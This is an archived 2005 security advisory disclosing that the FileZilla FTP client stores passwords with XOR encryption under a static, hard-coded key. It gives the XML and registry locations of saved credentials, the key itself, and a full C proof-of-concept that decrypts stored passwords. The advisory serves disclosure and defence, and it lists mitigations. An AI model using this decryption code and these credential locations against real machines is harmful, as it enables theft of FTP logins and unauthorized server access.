<<< Date Index >>>     <<< Thread Index >>>

FileZilla weakly-encrypted password vulnerability: advisory + PoC



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title:          FileZilla weakly-encrypted password vulnerability
Risk:           HIGH
Credits:        pagvac (Adrian Pastor)
Date found:     6th August, 2005
Homepage:       www.ikwt.com
                www.adrianpv.com
E-mail:         m123303[ - at - ]richmond.ac.uk


Background
- -----------
FileZilla is the most active and most downloaded open source FTP/SFTP
client (according to www.SourceForge.org at time of writing).
Currently 
there is only a Windows version of this client.

For some stats visit:
http://sourceforge.net/top/mostactive.php?type=week
http://sourceforge.net/top/toplist.php?type=downloads_week 

The project page can be found at:
http://sourceforge.net/projects/filezilla/

This advisory plus PoC code and executable can be found in the
following links:

http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zi
p

Versions affected
- -----------------
This vulnerability has been successfully tested on versions 2.2.14b 
and 2.2.15. However, it is suspected that most previous versions are 
also affected.


Vulnerability summary
- ---------------------
- - FileZilla client stores password using weak XOR "encryption"
- - The value of the cipher key is static (it never changes) and can 
  be found in the source code


Description of vulnerability
- ----------------------------
FileZilla saves configuration settings in two different locations:

- - in an XML file 
- - in the Windows registry

The method used to save configuration settings depends on the
preferences used by the user during the installation of 
FileZilla. Either way, all configuration settings are stored in
cleartext, EXCEPT for the password. However, the password 
is stored using very weak XOR "encryption" which can be easily
reversed. 

There exists a problem in the way the XOR encryption is implemented
because the same cipher key is always used. This key is 
hard-coded, which means that anyone can analyze the source code of
the application and find it. Of course, this wouldn't be 
so easy if FileZilla wasn't an open source application.

Once the key is known, an attacker can use it to decrypt the password
back to its cleartext form. Because the XOR cryptographic algorithm
used 
is symmetric, the same key is used for both, encrypting and
decrypting.

As mentioned before, the rest of the configuration settings are all
in cleartext. Some information that would be useful for an 
attacker includes hostname of the server to connect to, default port,
and username. 

If successfully exploited, this vulnerability will allow an attacker 
to access FTP (or SFTP) servers with the privileges of the user whose
configuration settings were stolen from.

In practice, this vulnerability could be exploited after a machine
has been compromised, or by fooling the user into executing malicious
code. Such code could dump the configuration settings, decrypt the
password/s 
and sends them all to the attacker. 

It is common to see many popular trojans out there that exploit weak
encryption vulnerabilities of this type. These trojans 
dump the credentials of popular applications such as Internet
Explorer, VNC or even dialup connections. FileZilla could be 
the next added application in the list of all those trojans with
password-dumping features.

This vulnerability is somehow similar to the one found by Conde
Vampiro in VNC 3 back in 1999. It's similar because in both 
cases we find an open source application using a fixed cipher key to
decrypt passwords. Thus, making trivial to find the key. 

For more information on Conde Vampiro's findings visit
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html


Vulnerability details
- ---------------------
The XML configuration file is found at:

%programfiles%\FileZilla\FileZilla.xml

Where %programfiles% is the "program files" directory. This is
usually "c:\program files" by default.

The configuration settings are saved in the registry in:

Hive:   HKEY_CURRENT_USER
Key:    Software\FileZilla\Site Manager\[site_name]\

Where [site_name] is the name given to the connection by the user.

The password is saved in the previous key as a value with the
following properties:
Value:  Pass
Type:   REG_SZ (string terminated in NULL)


The cipher key can be found in Crypt.cpp and its value is:
"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"


Solution
- --------
Choose "Use secure mode" during the installation (this disables
FileZilla from saving passwords), lockdown your client 
machines where the FileZilla client is installed, or update to a
patched version which fixes this issue (if available).


PoC Code
- --------
/*

Filename:       filezilla-pwdec.c
Title:          FileZilla Client - Weakly encrypted password exploit v0.01
Author:         pagvac (Adrian Pastor)
Date:           8th August, 2005
License:        GPL
email:          m123303[-a-t-]richmond.ac.uk
homepage:       www.ikwt.com (In Knowledge We Trust)
                www.adrianpv.com

Description:    this tool asks the user for the "encrypted" password and
                computes the cleartext version of the password

Other info:     compile as a Win32 console application project in Visual
C++

Copyright (C) 2005  pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cypher key)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE:  decimal values representing ASCII chars,
//              every three digits becomes one ASCII char
//              e.g.:   042040063063
//POST: ASCII chars are copied back to buff[] 
//              e.g.:   *(??
//              the length of the new string is returned
int digit2char(char buff[])
{
        char tmp_buff[4], ascii_buff[MAX_SIZE];
        unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
        for(i=0,j=0;i<strlen(buff);i+=3,++j) 
        {
                tmp_buff[0]=buff[i];
                tmp_buff[1]=buff[i+1];
                tmp_buff[2]=buff[i+2];
                tmp_buff[3]='\0';
                
                n=atoi(tmp_buff);
                ascii_buff[j]=(char)n;
        }
        ascii_buff[j]='\0';
        printf("ascii_buff:%s\n", ascii_buff);
        strcpy(buff, ascii_buff);

        return len;
}

//PRE: buffer containing ASCII chars of cypher 
//     (rather than their numberic ASCII value)
//POST:length of cleartext password is returned
unsigned int decrypt(char buff[])
{
        unsigned int i, pos, len;
        
        len=digit2char(buff);
        pos=len%strlen(m_key);

        for (i=0;i<len;i++)
                buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

        return len;
}

int main(void) 
{
        char cypher[MAX_SIZE];
        unsigned int len=0,i=0;

        printf("Enter cypher (encrypted password)\ne.g.:
120125125112000\n->");
        scanf("%s", cypher);
        if(strlen(cypher)%3==0)
        {
                len=decrypt(cypher);
                printf("cleartext password:");
                for(i=0;i<len;++i)
                        printf("%c",cypher[i]);
                printf("\n");
        }
        else
        {
                printf("You didn't enter a valid cypher!\n");
                printf("It should be a numeric value whose length is multiple of
3\n");
        }

        printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
        Sleep(SLEEP_TIME);
        return 0;
}

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQxho+LteQP8gtTAfEQI7JwCeNNjIc/wmQ8Dwbg6jjs0u/Iyh/GoAoJ24
bq4jAqPwakzJk+rrAdpFaxr0
=fWuP
-----END PGP SIGNATURE-----